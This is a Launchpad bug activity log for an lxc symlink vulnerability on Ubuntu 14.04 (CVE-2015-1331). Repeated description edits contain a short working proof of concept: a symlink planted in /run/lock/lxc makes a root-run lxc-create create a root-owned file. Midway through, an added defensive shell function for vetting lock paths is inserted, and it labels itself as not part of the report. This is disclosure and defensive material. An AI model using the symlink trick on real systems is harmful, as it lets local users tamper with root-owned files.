Date | Who | What | Old value | New value | Message
2015-07-02 12:46:33 | Roman Fiedler | bug | | | added bug
2015-07-02 15:16:51 | Tyler Hicks | bug | | | added subscriber Stéphane Graber
2015-07-02 15:16:59 | Tyler Hicks | bug | | | added subscriber Serge Hallyn
2015-07-02 15:30:43 | Tyler Hicks | lxc (Ubuntu): status | New | Incomplete |
2015-07-02 15:35:51 | Tyler Hicks | lxc (Ubuntu): status | Incomplete | Confirmed |
2015-07-02 15:46:07 | Tyler Hicks | description |
Old value:
When lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
POC:
# su -s /bin/bash nobody
# mkdir -p lxc/var/lib/lxc
# ln -s /etc/suid-debug lxc/var/lib/lxc/somename
As root:
lxc-info --name somename
The guest "somename" has to exist; the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS.
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
New value:
When lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
Arbitrary file creation PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
Arbitrary file truncation PoC:
TODO (Roman)
The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS.
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
2015-07-02 15:50:45 | Marc Deslauriers | cve linked | | 2015-1331 |
2015-07-02 16:19:29 | Tyler Hicks | bug | | | added subscriber Ubuntu Security Team
2015-07-02 18:51:18 | Tyler Hicks | description |
Old value:
When lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
Arbitrary file creation PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
Arbitrary file truncation PoC:
TODO (Roman)
The method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS.
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
New value:
When lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container.
PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
2015-07-15 15:58:34 | Tyler Hicks | attachment added | | 0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+attachment/4429477/+files/0001-lxclock-use-run-lxc-lock-rather-than-run-lock-lxc.patch |
2015-07-22 10:15:14 | Roman Fiedler | description |
Old value:
When lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container.
PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
New value:
During LXC security analysis (see [1]) it was found that when lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container or to automatic startup after boot starting one.
PoC:
$ mkdir -p /run/lock/lxc/var/lib/lxc
$ ln -s /test /run/lock/lxc/var/lib/lxc/somename
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
100 /var/lib/dpkg/status
1.0.3-0ubuntu3 0
500 http://archivexxx/ubuntu/ trusty/main amd64 Packages
[1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
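The root cause recorded in the descriptions above is that /run/lock is a world-writable sticky directory, so any local user can pre-create /run/lock/lxc with symlinks inside it before a root-run lxc tool creates the directory itself; the attached patch moves the lock directory to /run/lxc/lock, out of reach of unprivileged users. The shell function below is an added example, not code from the bug report or from the lxc project, of the vetting a tool author or administrator can apply before trusting any lock directory under such a path: it walks every component of the path from the leaf up and refuses one that is a symlink, that exists but is not a directory, or that sits inside a world-writable parent without being owned by the caller. The function names and the temporary paths used when exercising it are assumptions made for this demonstration.

```shell
#!/bin/sh
# Added example, not from the bug report or the lxc project: decide whether a
# lock directory path could have been planted by another local user.
# Returns 0 when every component is safe, 1 (with a reason on stderr) otherwise.
#
# Rules, applied to each component from the leaf up to /:
#   1. the component must not be a symlink (a planted link redirects the
#      open()/mkdir() done by root, as in the /run/lock/lxc report above);
#   2. if the component exists it must be a directory;
#   3. if its parent is world-writable (sticky dirs such as /run/lock or /tmp),
#      an existing component must be owned by the calling user, because any
#      user could have created it there first.
check_lock_path() {
    cur=$1
    case $cur in
        /*) ;;
        *) echo "unsafe: $cur is not an absolute path" >&2; return 1 ;;
    esac
    # Reject "." / ".." / doubled slashes so every component is looked at
    # exactly once and a trailing slash cannot hide a symlink from -L.
    case $cur in
        */../*|*/..|*/./*|*/.|*//*)
            echo "unsafe: $cur is not a normalized path" >&2; return 1 ;;
    esac
    while [ "$cur" != "/" ] && [ "${cur%/}" != "$cur" ]; do
        cur=${cur%/}
    done
    while [ "$cur" != "/" ]; do
        if [ -L "$cur" ]; then
            echo "unsafe: $cur is a symlink" >&2
            return 1
        fi
        if [ -e "$cur" ] && [ ! -d "$cur" ]; then
            echo "unsafe: $cur is not a directory" >&2
            return 1
        fi
        parent=$(dirname "$cur")
        # The "others" write bit is character 9 of the ls -ld mode string.
        others_w=$(ls -ld "$parent" | cut -c9)
        if [ -e "$cur" ] && [ "$others_w" = "w" ] && [ ! -O "$cur" ]; then
            echo "unsafe: $cur is inside world-writable $parent but not owned by us" >&2
            return 1
        fi
        cur=$parent
    done
    return 0
}

# Create the lock directory only once the path has been vetted, so a symlink
# already waiting there is never followed.
ensure_lock_dir() {
    check_lock_path "$1" || return 1
    mkdir -p "$1"
}
```

Typical use is `ensure_lock_dir /run/lxc/lock` from a tool that runs as root; with the old `/run/lock/lxc` location the check fails as soon as another user has planted a link there, which is exactly the window the report describes. The ownership rule is what makes a sticky directory tolerable at all: a directory the caller created itself inside /run/lock is fine, one that was already there is not.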
2015-07-22 14:12:24 | Launchpad Janitor | lxc (Ubuntu): status | Confirmed | Fix Released |
2015-07-22 14:12:24 | Launchpad Janitor | cve linked | | 2015-1131 |
2015-07-22 14:12:24 | Launchpad Janitor | cve linked | | 2015-1334 |
2015-07-22 14:12:25 | Launchpad Janitor | lxc (Ubuntu): status | Confirmed | Fix Released |
2015-07-22 14:12:26 | Launchpad Janitor | lxc (Ubuntu): status | Confirmed | Fix Released |
2015-07-22 14:18:40 | Tyler Hicks | information type | Private Security | Public Security |
2015-07-22 19:22:23 | Tyler Hicks | cve unlinked | 2015-1131 | |
2015-07-22 19:23:33 | Tyler Hicks | cve linked | | 2015-1131 |
2015-07-22 19:23:54 | Tyler Hicks | cve unlinked | 2015-1334 | |
2015-07-22 19:24:10 | Tyler Hicks | cve unlinked | 2015-1331 | |
2015-07-22 19:24:44 | Tyler Hicks | cve linked | | 2015-1331 |
2015-07-22 19:24:57 | Tyler Hicks | cve unlinked | 2015-1131 | |